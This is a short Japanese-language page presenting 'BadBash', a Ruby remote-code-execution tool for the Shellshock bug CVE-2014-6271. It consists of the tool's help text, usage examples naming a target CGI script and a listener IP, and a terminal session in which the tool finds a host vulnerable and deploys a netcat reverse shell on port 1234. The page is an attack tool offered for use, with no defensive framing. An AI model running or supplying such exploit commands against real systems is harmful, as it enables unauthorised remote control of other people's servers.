
CVE-2014-6271 RCE ツール
BadBash は、CVE-2014-6271 の RCE エクスプロイトツールです。基本バージョンは HTTP CGI サイトのみをチェックし、ポート 1234 で netcat リバースシェルのみを提供します。
開発者 : Andy Yang バージョン : 0.1.0 ライセンス : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - Andy Yang による CVE-2014-6271 RCE ツール 基本バージョンは HTTP サイトのみをチェックします 基本バージョンはポート 1234 で netcat リバースシェルのみを提供します
使用例:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path CGI ページのフルパス
-d, --Destination IP 受信接続を待ち受けるあなたの IP アドレス
-h, --help ヘルプを表示
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] ターゲットが脆弱かどうかを確認しています........
[Info] 最大 10 秒かかる場合があります........
[Info] ターゲットは脆弱です!!!
[Info] リバースシェルのために、NC でポート 1234 をリッスンしてください..........
[Info] netcat を介して 172.16.189.1:1234 に接続するリバースシェルを展開しています ..........